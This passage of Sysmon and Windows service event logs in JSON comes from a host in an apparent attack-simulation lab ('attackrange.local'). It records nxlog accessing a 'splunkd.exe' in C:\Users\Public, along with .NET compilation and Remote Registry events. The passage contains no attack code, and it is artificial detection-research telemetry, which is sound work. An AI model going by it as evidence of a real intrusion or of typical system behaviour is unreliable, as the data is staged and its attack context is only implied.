(x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:14","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6911,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:14.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:14.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6912,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:15.554\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:15.554","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6913,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:15.757\r\nProcessGuid: {E2A3D6B1-12BC-5F25-0000-0010FAC80900}\r\nProcessId: 3756\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\eac-0\\System.dll\r\nCreationUtcTime: 2020-08-01 06:59:15.757","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:15.757","ProcessGuid":"{E2A3D6B1-12BC-5F25-0000-0010FAC80900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\eac-0\\System.dll","CreationUtcTime":"2020-08-01 06:59:15.757","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76868,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Remote Registry service entered the stopped state.","param1":"Remote Registry","param2":"stopped","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6914,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:16.179\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12C4-5F25-0000-0010E2D00900}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:16.179","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12C4-5F25-0000-0010E2D00900}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6915,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:16.179\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12C4-5F25-0000-0010E2D00900}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:16.179","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12C4-5F25-0000-0010E2D00900}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6916,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:16.179\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12C4-5F25-0000-0010E2D00900}\r\nTargetProcessId: 5112\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:16.179","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12C4-5F25-0000-0010E2D00900}","TargetProcessId":"5112","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6917,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:16.413\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12C4-5F25-0000-00103CD40900}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:16.413","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12C4-5F25-0000-00103CD40900}","TargetProcessId":"2604","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6918,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:16.413\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12C4-5F25-0000-00103CD40900}\r\nTargetProcessId: 2604\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 